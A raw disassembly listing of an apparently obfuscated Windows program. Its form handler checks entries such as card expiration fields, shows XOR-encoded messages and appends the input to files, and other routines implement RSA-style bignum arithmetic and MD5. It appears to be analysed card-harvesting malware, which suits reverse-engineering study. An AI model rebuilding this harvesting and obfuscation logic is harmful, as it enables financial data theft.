jnz short loc_40AFE5
push ds:dword_41EB64
call sub_40C758 ; SetFocus
loc_40AFE5: ; CODE XREF: sub_40AF80+58�j
call sub_40C548 ; GetTickCount
cmp ebx, ds:dword_41EB64
jnz short loc_40AFFD
push ds:dword_41EB5C
call sub_40C758 ; SetFocus
loc_40AFFD: ; CODE XREF: sub_40AF80+70�j
call sub_40C5D8 ; IsDebuggerPresent
cmp ebx, ds:dword_41EB5C
jnz short loc_40B015
push ds:dword_432DC4
call sub_40C758 ; SetFocus
loc_40B015: ; CODE XREF: sub_40AF80+24�j
; sub_40AF80+38�j ...
and [ebp+var_4], 0
cmp ebx, ds:dword_432DC4
jnz short loc_40B029
mov eax, ds:dword_41FB64
mov [ebp+var_4], eax
loc_40B029: ; CODE XREF: sub_40AF80+9F�j
lea edi, [ebp+var_E]
lea esi, aR3lf9 ; "$R3LF9-"
movsd
movsd
cmp ebx, ds:dword_41EB64
jnz short loc_40B044
mov eax, ds:dword_41EB60
mov [ebp+var_4], eax
loc_40B044: ; CODE XREF: sub_40AF80+BA�j
call sub_40C518 ; GetProcessHeap
cmp ebx, ds:dword_410630
jnz short loc_40B059
mov eax, ds:dword_40DFD0
mov [ebp+var_4], eax
loc_40B059: ; CODE XREF: sub_40AF80+CF�j
mov [ebp+var_5], 40h
add [ebp+var_5], 1
cmp ebx, ds:dword_41EB5C
jnz short loc_40B071
mov eax, ds:dword_413E14
mov [ebp+var_4], eax
loc_40B071: ; CODE XREF: sub_40AF80+E7�j
cmp [ebp+var_4], 0
jz short loc_40B089
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
push [ebp+var_4]
call sub_40C710 ; CallWindowProcA
loc_40B089: ; CODE XREF: sub_40AF80+F5�j
pop edi
pop esi
pop ebx
leave
retn 10h
sub_40AF80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B090 proc near ; DATA XREF: sub_40A74E+41E�o
var_275 = byte ptr -275h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_246 = byte ptr -246h
var_245 = dword ptr -245h
var_241 = byte ptr -241h
var_240 = dword ptr -240h
var_23C = byte ptr -23Ch
var_238 = byte ptr -238h
var_139 = dword ptr -139h
var_135 = byte ptr -135h
var_132 = byte ptr -132h
var_131 = dword ptr -131h
var_12D = dword ptr -12Dh
var_129 = byte ptr -129h
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = byte ptr -11Ch
var_11B = byte ptr -11Bh
var_11A = word ptr -11Ah
var_118 = dword ptr -118h
var_111 = byte ptr -111h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_106 = byte ptr -106h
var_105 = byte ptr -105h
var_104 = byte ptr -104h
var_5 = byte ptr -5
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 278h
push ebx
push esi
push edi
lea edi, [ebp+var_5]
lea esi, aGra ; "#GRA"
mov ecx, 5
rep movsb
mov eax, [ebp+arg_4]
cmp eax, 10h
jz loc_40B2F6
jg short loc_40B0C8
cmp eax, 2
jz loc_40B2CF
jmp loc_40B98B
; ---------------------------------------------------------------------------
loc_40B0C8: ; CODE XREF: sub_40B090+28�j
cmp eax, 111h
jz loc_40B406
cmp eax, 113h
jz short loc_40B0FA
cmp eax, 111h
jl loc_40B98B
cmp eax, 138h
jz loc_40B311
jmp loc_40B98B
; ---------------------------------------------------------------------------
call sub_40C554 ; GetVersion
loc_40B0FA: ; CODE XREF: sub_40B090+48�j
cmp dword_43C21C, 0
jz loc_40B26B
mov [ebp+var_240], 0E88h
mov eax, 0BE8h
mul [ebp+var_240]
mov [ebp+var_274], eax
mov [ebp+var_240], eax
push 9
push offset aAjfjgoFq ; "AjfJgo`fq"
call sub_40129C
push eax
push dword_43C21C
call sub_408E57
mov [ebp+var_24C], eax
mov [ebp+var_245+1], 390Ah
add [ebp+var_245+1], 69A4h
push 8
push offset a@UijwW ; "@}uijw`w"
call sub_40129C
push eax
push [ebp+var_24C]
call sub_408E57
add esp, 20h
mov [ebp+var_250], eax
mov byte ptr [ebp+var_245], 81h
movzx eax, byte ptr [ebp+var_245]
imul eax, 6827h
mov byte ptr [ebp+var_245], al
lea eax, [ebp+var_260]
push eax
push [ebp+var_250]
call sub_40C728 ; GetWindowRect
or eax, eax
jz loc_40B26B
mov [ebp+var_246], 2
movzx eax, [ebp+var_246]
imul eax, 21FDh
mov [ebp+var_246], al
lea eax, [ebp+var_270]
push eax
push ds:dword_41FC74
call sub_40C728 ; GetWindowRect
or eax, eax
jz loc_40B26B
mov eax, [ebp+var_258]
sub eax, [ebp+var_260]
sub eax, 4
mov edx, [ebp+var_268]
sub edx, [ebp+var_270]
cmp eax, edx
jnz short loc_40B221
mov eax, [ebp+var_254]
sub eax, [ebp+var_25C]
sub eax, 4
mov edx, [ebp+var_264]
sub edx, [ebp+var_26C]
cmp eax, edx
jz short loc_40B26B
loc_40B221: ; CODE XREF: sub_40B090+170�j
call sub_40C548 ; GetTickCount
push 1
mov eax, [ebp+var_254]
sub eax, [ebp+var_25C]
push eax
mov eax, [ebp+var_258]
sub eax, [ebp+var_260]
push eax
push 0
push 0
push ds:dword_41FC74
call sub_40C854 ; MoveWindow
mov [ebp+var_275], 1Ch
movzx eax, [ebp+var_275]
imul eax, 67F2h
mov [ebp+var_275], al
loc_40B26B: ; CODE XREF: sub_40B090+71�j
; sub_40B090+119�j ...
cmp dword_43C218, 0
jz loc_40B9A9
mov word ptr [ebp+var_240+2], 4BD8h
movzx eax, word ptr [ebp+var_240+2]
imul eax, 518Ch
mov word ptr [ebp+var_240+2], ax
mov eax, dword_43C218
mov dword_43C21C, eax
mov eax, dword_446A91
mov [ebp+var_245+3], eax
and dword_43C218, 0
push dword_43C21C
call sub_408EFF
pop ecx
mov ax, word_446A95
mov word ptr [ebp+var_245+1], ax
jmp loc_40B9A9
; ---------------------------------------------------------------------------
loc_40B2CF: ; CODE XREF: sub_40B090+2D�j
mov eax, ds:dword_41C900
cmp [ebp+arg_0], eax
jnz short loc_40B2E0
push 0
call sub_40C824 ; PostQuitMessage
loc_40B2E0: ; CODE XREF: sub_40B090+247�j
lea edi, [ebp+var_129]
lea esi, byte_446A97
xor ecx, ecx
inc ecx
rep movsb
jmp loc_40B9A9
; ---------------------------------------------------------------------------
loc_40B2F6: ; CODE XREF: sub_40B090+22�j
mov eax, ds:dword_41C900
cmp [ebp+arg_0], eax
jnz loc_40B9A9
push [ebp+arg_0]
call sub_40C848 ; DestroyWindow
jmp loc_40B9A9
; ---------------------------------------------------------------------------
loc_40B311: ; CODE XREF: sub_40B090+5A�j
mov eax, [ebp+arg_C]
mov [ebp+var_128], eax
call sub_40C518 ; GetProcessHeap
mov eax, [ebp+var_128]
cmp eax, ds:dword_432DBC
jz short loc_40B359
cmp eax, ds:dword_413E18
jz short loc_40B359
cmp eax, ds:dword_41B778
jz short loc_40B359
cmp eax, ds:dword_4350B4
jz short loc_40B359
cmp eax, ds:dword_432DC0
jz short loc_40B359
cmp eax, ds:dword_43A398
jnz loc_40B9A9
loc_40B359: ; CODE XREF: sub_40B090+29B�j
; sub_40B090+2A3�j ...
call sub_40C4C4 ; GetCurrentThreadId
mov eax, [ebp+var_128]
cmp eax, ds:dword_432DC0
jz short loc_40B374
cmp eax, ds:dword_43A398
jnz short loc_40B383
loc_40B374: ; CODE XREF: sub_40B090+2DA�j
push 1010B0h
push [ebp+arg_8]
call sub_40C884 ; SetTextColor
jmp short loc_40B38D
; ---------------------------------------------------------------------------
loc_40B383: ; CODE XREF: sub_40B090+2E2�j
push 0
push [ebp+arg_8]
call sub_40C884 ; SetTextColor
loc_40B38D: ; CODE XREF: sub_40B090+2F1�j
call sub_40C518 ; GetProcessHeap
push 0FFFFFFh
push [ebp+arg_8]
call sub_40C878 ; SetBkColor
and [ebp+var_254], 0
and [ebp+var_250], 0
lea eax, [ebp+var_254]
push eax
call sub_40C890 ; CreateBrushIndirect
mov [ebp-248h], eax
mov [ebp+var_240], 7376h
mov eax, [ebp+var_240]
mov edx, eax
add edx, eax
mov [ebp+var_240], edx
mov eax, [ebp-248h]
jmp loc_40B9A9
; ---------------------------------------------------------------------------
mov word ptr [ebp+var_245+3], 4823h
movzx eax, word ptr [ebp+var_245+3]
imul eax, 5C47h
mov word ptr [ebp+var_245+3], ax
jmp loc_40B9A9
; ---------------------------------------------------------------------------
loc_40B406: ; CODE XREF: sub_40B090+3D�j
mov eax, dword_446A98
mov [ebp+var_12D], eax
push 2
push offset aV ; " v"
call sub_40129C
push offset byte_433F40
push eax
lea edi, [ebp+var_238]
push edi
call sub_40C9D4
add esp, 14h
call sub_40C518 ; GetProcessHeap
push 0FFh
lea eax, [ebp+var_104]
push eax
push ds:dword_432DC4
call sub_40C71C ; GetWindowTextA
mov [ebp+var_110], 40DCh
mov eax, 7474h
mul [ebp+var_110]
mov [ebp+var_240], eax
mov [ebp+var_110], eax
cmp [ebp+var_104], 0
jnz short loc_40B4B3
mov eax, dword_446A9C
mov [ebp+var_245+1], eax
push 1Fh
push offset aUiDvVIFq@Ulwdq ; "Ui`dv`)%v`i`fq%@}ulwdqljk%Hjkqm"
call sub_40129C
add esp, 8
push 0
push 0
push eax
push 0
call sub_40C794 ; MessageBoxA
call sub_40C4B8 ; GetCurrentProcessId
push ds:dword_432DC4
call sub_40C758 ; SetFocus
jmp loc_40B9A9
; ---------------------------------------------------------------------------
loc_40B4B3: ; CODE XREF: sub_40B090+3E6�j
push 5
push offset aVV ; " v% v"
call sub_40129C
lea edi, [ebp+var_104]
push edi
lea edi, [ebp+var_238]
push edi
push eax
lea edi, [ebp+var_238]
push edi
call sub_40C9D4
add esp, 18h
mov [ebp+var_111], 8Dh
sub [ebp+var_111], 1Fh
push 0FFh
lea eax, [ebp+var_104]
push eax
push ds:dword_41EB64
call sub_40C71C ; GetWindowTextA
mov [ebp+var_118], 3CB9h
sub [ebp+var_118], 1299h
cmp [ebp+var_104], 0
jnz short loc_40B585
lea edi, [ebp+var_245+2]
lea esi, byte_446AA0
xor ecx, ecx
inc ecx
rep movsb
push 1Eh
push offset aUiDvVIFq@Ulw_0 ; "Ui`dv`)%v`i`fq%@}ulwdqljk%\\`dw"
call sub_40129C
add esp, 8
push 0
push 0
push eax
push 0
call sub_40C794 ; MessageBoxA
mov word ptr [ebp+var_245+3], 5F5Eh
movzx eax, word ptr [ebp+var_245+3]
imul eax, 7314h
mov word ptr [ebp+var_245+3], ax
push ds:dword_41EB64
call sub_40C758 ; SetFocus
mov ax, word_446AA1
mov word ptr [ebp+var_245], ax
jmp loc_40B9A9
; ---------------------------------------------------------------------------
loc_40B585: ; CODE XREF: sub_40B090+48D�j
push 5
push offset aVV_0 ; " v( v"
call sub_40129C
lea edi, [ebp+var_104]
push edi
lea edi, [ebp+var_238]
push edi
push eax
lea edi, [ebp+var_238]
push edi
call sub_40C9D4
add esp, 18h
call sub_40C4B8 ; GetCurrentProcessId
push 0FFh
lea eax, [ebp+var_104]
push eax
push ds:dword_41EB5C
call sub_40C71C ; GetWindowTextA
cmp [ebp+var_104], 0
jz loc_40B73C
mov [ebp+var_11A], 494Ah
inc [ebp+var_11A]
lea ecx, [ebp+var_104]
or eax, 0FFFFFFFFh
loc_40B5F1: ; CODE XREF: sub_40B090+566�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B5F1
cmp eax, 4
jb loc_40B73C
mov eax, dword_446AA3
mov [ebp+var_131], eax
mov [ebp+var_106], 0
jmp short loc_40B637
; ---------------------------------------------------------------------------
loc_40B615: ; CODE XREF: sub_40B090+5C0�j
movzx eax, [ebp+var_106]
mov al, [ebp+eax+var_104]
cmp al, 30h
jl short loc_40B62B
cmp al, 39h
jle short loc_40B630
loc_40B62B: ; CODE XREF: sub_40B090+595�j
jmp loc_40B73C
; ---------------------------------------------------------------------------
loc_40B630: ; CODE XREF: sub_40B090+599�j
add [ebp+var_106], 1
loc_40B637: ; CODE XREF: sub_40B090+583�j
lea ecx, [ebp+var_104]
or eax, 0FFFFFFFFh
loc_40B640: ; CODE XREF: sub_40B090+5B5�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B640
movzx esi, [ebp+var_106]
cmp esi, eax
jb short loc_40B615
call sub_40C4C4 ; GetCurrentThreadId
mov [ebp+var_105], 0
jmp loc_40B71B
; ---------------------------------------------------------------------------
loc_40B663: ; CODE XREF: sub_40B090+6A4�j
call sub_40C4B8 ; GetCurrentProcessId
mov word ptr [ebp+var_245+1], 0C1Ah
movzx eax, word ptr [ebp+var_245+1]
mov edx, eax
add edx, eax
mov eax, edx
mov word ptr [ebp+var_245+1], ax
mov al, [ebp+var_105]
mov [ebp+var_241], al
jmp short loc_40B6BC
; ---------------------------------------------------------------------------
loc_40B693: ; CODE XREF: sub_40B090+645�j
movzx eax, [ebp+var_241]
movsx eax, [ebp+eax+var_104]
movzx edx, [ebp+var_105]
movsx edx, [ebp+edx+var_104]
cmp eax, edx
jnz short loc_40B6D7
add [ebp+var_241], 1
loc_40B6BC: ; CODE XREF: sub_40B090+601�j
lea ecx, [ebp+var_104]
or eax, 0FFFFFFFFh
loc_40B6C5: ; CODE XREF: sub_40B090+63A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B6C5
movzx esi, [ebp+var_241]
cmp esi, eax
jb short loc_40B693
loc_40B6D7: ; CODE XREF: sub_40B090+623�j
mov dword ptr [ebp-248h], 3Bh
sub dword ptr [ebp-248h], 23B8h
movzx eax, [ebp+var_241]
movzx edx, [ebp+var_105]
sub eax, edx
cmp eax, 3
jg short loc_40B73C
mov [ebp+var_24C], 752Fh
add [ebp+var_24C], 926h
add [ebp+var_105], 1
loc_40B71B: ; CODE XREF: sub_40B090+5CE�j
lea ecx, [ebp+var_104]
or eax, 0FFFFFFFFh
loc_40B724: ; CODE XREF: sub_40B090+699�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B724
movzx esi, [ebp+var_105]
cmp esi, eax
jb loc_40B663
jmp short loc_40B7A1
; ---------------------------------------------------------------------------
loc_40B73C: ; CODE XREF: sub_40B090+542�j
; sub_40B090+56B�j ...
mov eax, dword_43C098
add eax, 7C1h
push eax
call sub_40C95C
mov [ebp+var_11B], 6Bh
add [ebp+var_11B], 54h
push 35h
push offset byte_446AC9
call sub_40129C
mov [ebp+var_245+1], eax
push 13h
push offset byte_446AB5
call sub_40129C
add esp, 14h
push 0
push eax
mov edi, [ebp+var_245+1]
push edi
push 0
call sub_40C794 ; MessageBoxA
call sub_40C554 ; GetVersion
push ds:dword_41EB5C
call sub_40C758 ; SetFocus
jmp loc_40B9A9
; ---------------------------------------------------------------------------
loc_40B7A1: ; CODE XREF: sub_40B090+6AA�j
push 5
push offset aVV ; " v% v"
call sub_40129C
lea edi, [ebp+var_104]
push edi
lea edi, [ebp+var_238]
push edi
push eax
lea edi, [ebp+var_238]
push edi
call sub_40C9D4
add esp, 18h
lea edi, [ebp+var_132]
lea esi, byte_446AA7
xor ecx, ecx
inc ecx
rep movsb
push 0
push 0
push 4
push 0
push 0
push 40000000h
push offset dword_41FB70
call sub_40C650 ; CreateFileA
mov [ebp+var_124], eax
call sub_40C4E8 ; RtlGetLastWin32Error
push 2
push 0
push 0
push [ebp+var_124]
call sub_40C65C ; SetFilePointer
mov [ebp+var_10C], 5EB9h
mov eax, [ebp+var_10C]
mov edx, eax
add edx, eax
mov [ebp+var_10C], edx
lea ecx, [ebp+var_238]
or eax, 0FFFFFFFFh
loc_40B834: ; CODE XREF: sub_40B090+7A9�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B834
push 0
lea esi, [ebp+var_23C]
push esi
push eax
lea edi, [ebp+var_238]
push edi
push [ebp+var_124]
call sub_40C6C8 ; WriteFile
call sub_40C4B8 ; GetCurrentProcessId
push 2
push offset word_446AB2
call sub_40129C
add esp, 8
push 0
lea edi, [ebp+var_23C]
push edi
mov edi, dword_43C094
add edi, 1
push edi
push eax
push [ebp+var_124]
call sub_40C6C8 ; WriteFile
call sub_40C5D8 ; IsDebuggerPresent
push [ebp+var_124]
call sub_40C530 ; CloseHandle
lea edi, [ebp+var_135]
lea esi, byte_446AA8
mov ecx, 3
rep movsb
push ds:dword_41FC74
call sub_40C848 ; DestroyWindow
mov [ebp+var_11C], 3Bh
add [ebp+var_11C], 1
push 0
push 0
push 4
push 0
push 0
push 40000000h
push offset dword_40F0A0
call sub_40C650 ; CreateFileA
mov [ebp+var_124], eax
call sub_40C5D8 ; IsDebuggerPresent
push 2
push 0
push 0
push [ebp+var_124]
call sub_40C65C ; SetFilePointer
call sub_40C5D8 ; IsDebuggerPresent
lea ecx, byte_433F40
or eax, 0FFFFFFFFh
loc_40B909: ; CODE XREF: sub_40B090+87E�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B909
mov edi, eax
push 0
lea esi, [ebp+var_23C]
push esi
push edi
push offset byte_433F40
push [ebp+var_124]
call sub_40C6C8 ; WriteFile
call sub_40C554 ; GetVersion
push 1
push offset byte_446AB0
call sub_40129C
add esp, 8
push 0
lea edi, [ebp+var_23C]
push edi
mov edi, 10h
sub edi, dword_43C098
push edi
push eax
push [ebp+var_124]
call sub_40C6C8 ; WriteFile
push [ebp+var_124]
call sub_40C530 ; CloseHandle
push 5
push ds:dword_41DA74
call sub_40C830 ; ShowWindow
mov [ebp+var_120], 0C90h
inc [ebp+var_120]
jmp short loc_40B9A9
; ---------------------------------------------------------------------------
loc_40B98B: ; CODE XREF: sub_40B090+33�j
; sub_40B090+4F�j ...
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40C860 ; DefWindowProcA
jmp short loc_40B9A9
; ---------------------------------------------------------------------------
mov eax, dword_446AAB
mov [ebp+var_139], eax
loc_40B9A9: ; CODE XREF: sub_40B090+1E2�j
; sub_40B090+23A�j ...
pop edi
pop esi
pop ebx
leave
retn 10h
sub_40B090 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40B9B0 proc near ; CODE XREF: sub_406D91+1A�p
; sub_406D91+3B�p
jmp ds:dword_448340
sub_40B9B0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40B9BC proc near ; CODE XREF: sub_40538B+D6�p
jmp ds:dword_44834C
sub_40B9BC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40B9C8 proc near ; CODE XREF: sub_40538B+17E�p
jmp ds:dword_448350
sub_40B9C8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40B9D4 proc near ; CODE XREF: sub_406980+55�p
jmp ds:dword_44835C
sub_40B9D4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40B9E0 proc near ; CODE XREF: sub_406980+28�p
jmp ds:dword_448360
sub_40B9E0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40B9EC proc near ; CODE XREF: sub_406980+1A�p
jmp ds:dword_448364
sub_40B9EC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40B9F8 proc near ; CODE XREF: sub_40692F+48�p
jmp ds:dword_448368
sub_40B9F8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BA04 proc near ; CODE XREF: sub_408860+18�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
cld
mov edi, [ebp+arg_4]
mov eax, 1
stosd
mov ecx, 0Fh
dec eax
rep stosd
lea edi, dword_447B48
mov esi, [ebp+arg_0]
mov ecx, 10h
rep movsd
mov edi, [ebp+arg_8]
call sub_40BACF
xor edx, edx
loc_40BA34: ; CODE XREF: sub_40BA04+52�j
push edx
push ebx
mov eax, [ebp+arg_8]
bt [eax], edx
jnb short loc_40BA46
mov edx, [ebp+arg_4]
call sub_40BA60
loc_40BA46: ; CODE XREF: sub_40BA04+38�j
lea edx, dword_447B48
call sub_40BA60
pop ebx
pop edx
inc edx
cmp edx, ebx
jbe short loc_40BA34
popa
pop ebp
retn 10h
sub_40BA04 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40BA60 proc near ; CODE XREF: sub_40BA04+3D�p
; sub_40BA04+48�p
lea edi, dword_447B08
mov ecx, 10h
xor eax, eax
rep stosd
lea edi, dword_447B48
call sub_40BACF
loc_40BA7A: ; CODE XREF: sub_40BA60+5D�j
lea edi, dword_447B08
mov ecx, 10h
xor eax, eax
loc_40BA87: ; CODE XREF: sub_40BA60+2C�j
rcl dword ptr [edi], 1
lea edi, [edi+4]
loop loc_40BA87
call sub_40BAE0
bt dword_447B48, ebx
jnb short loc_40BABC
mov esi, edx
lea edi, dword_447B08
xor eax, eax
mov ecx, 10h
loc_40BAAB: ; CODE XREF: sub_40BA60+55�j
mov eax, [esi]
adc [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_40BAAB
call sub_40BAE0
loc_40BABC: ; CODE XREF: sub_40BA60+3A�j
dec ebx
jns short loc_40BA7A
mov edi, edx
lea esi, dword_447B08
mov ecx, 10h
rep movsd
retn
sub_40BA60 endp
; =============== S U B R O U T I N E =======================================
sub_40BACF proc near ; CODE XREF: sub_40BA04+29�p
; sub_40BA60+15�p
mov ebx, 1FFh
loc_40BAD4: ; CODE XREF: sub_40BACF+B�j
bt [edi], ebx
jb short locret_40BADC
dec ebx
jnz short loc_40BAD4
locret_40BADC: ; CODE XREF: sub_40BACF+8�j
retn
sub_40BACF endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40BAE0 proc near ; CODE XREF: sub_40BA60+2E�p
; sub_40BA60+57�p
lea esi, dword_447B08
mov edi, [ebp+14h]
mov ecx, 0Fh
loc_40BAEE: ; CODE XREF: sub_40BAE0+19�j
mov eax, [esi+ecx*4]
cmp eax, [edi+ecx*4]
jb short locret_40BB17
ja short loc_40BAFB
dec ecx
jns short loc_40BAEE
loc_40BAFB: ; CODE XREF: sub_40BAE0+16�j
mov esi, [ebp+14h]
lea edi, dword_447B08
xor eax, eax
mov ecx, 10h
loc_40BB0B: ; CODE XREF: sub_40BAE0+35�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_40BB0B
locret_40BB17: ; CODE XREF: sub_40BAE0+14�j
retn
sub_40BAE0 endp
; =============== S U B R O U T I N E =======================================
sub_40BB18 proc near ; CODE XREF: sub_40BB69+32�p
; sub_40BB69+50�p ...
mov eax, ebx
and eax, ecx
push ebx
not ebx
and ebx, edx
or eax, ebx
pop ebx
retn
sub_40BB18 endp
; =============== S U B R O U T I N E =======================================
sub_40BB25 proc near ; CODE XREF: sub_40BB69+219�p
; sub_40BB69+238�p ...
mov eax, ebx
and eax, edx
push edx
not edx
and edx, ecx
or eax, edx
pop edx
retn
sub_40BB25 endp
; =============== S U B R O U T I N E =======================================
sub_40BB32 proc near ; CODE XREF: sub_40BB69+420�p
; sub_40BB69+43F�p ...
mov eax, ebx
xor eax, ecx
xor eax, edx
retn
sub_40BB32 endp
; =============== S U B R O U T I N E =======================================
sub_40BB39 proc near ; CODE XREF: sub_40BB69+627�p
; sub_40BB69+645�p ...
mov eax, edx
not eax
or eax, ebx
xor eax, ecx
retn
sub_40BB39 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BB42 proc near ; CODE XREF: sub_408884+9B�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov dword ptr [edi], 67452301h
mov dword ptr [edi+4], 0EFCDAB89h
mov dword ptr [edi+8], 98BADCFEh
mov dword ptr [edi+0Ch], 10325476h
popa
pop ebp
retn 4
sub_40BB42 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BB69 proc near ; CODE XREF: sub_408884+CC�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov eax, [edi]
mov dword_447B88, eax
mov eax, [edi+4]
mov dword_447B8C, eax
mov eax, [edi+8]
mov dword_447B90, eax
mov eax, [edi+0Ch]
mov dword_447B94, eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB18
add eax, [edi]
add eax, [esi]
add eax, 0D76AA478h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB18
add eax, [edi+0Ch]
add eax, [esi+4]
add eax, 0E8C7B756h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB18
add eax, [edi+8]
add eax, [esi+8]
add eax, 242070DBh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB18
add eax, [edi+4]
add eax, [esi+0Ch]
add eax, 0C1BDCEEEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB18
add eax, [edi]
add eax, [esi+10h]
add eax, 0F57C0FAFh
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB18
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A8304613h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB18
add eax, [edi+4]
add eax, [esi+1Ch]
add eax, 0FD469501h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB18
add eax, [edi]
add eax, [esi+20h]
add eax, 698098D8h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB18
add eax, [edi+0Ch]
add eax, [esi+24h]
add eax, 8B44F7AFh
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB18
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFFF5BB1h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB18
add eax, [edi+4]
add eax, [esi+2Ch]
add eax, 895CD7BEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB18
add eax, [edi]
add eax, [esi+30h]
add eax, 6B901122h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB18
add eax, [edi+0Ch]
add eax, [esi+34h]
add eax, 0FD987193h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB18
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0A679438Eh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB18
add eax, [edi+4]
add eax, [esi+3Ch]
add eax, 49B40821h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB25
add eax, [edi]
add eax, [esi+4]
add eax, 0F61E2562h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB25
add eax, [edi+0Ch]
add eax, [esi+18h]
add eax, 0C040B340h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB25
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 265E5A51h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB25
add eax, [edi+4]
add eax, [esi]
add eax, 0E9B6C7AAh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB25
add eax, [edi]
add eax, [esi+14h]
add eax, 0D62F105Dh
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB25
add eax, [edi+0Ch]
add eax, [esi+28h]
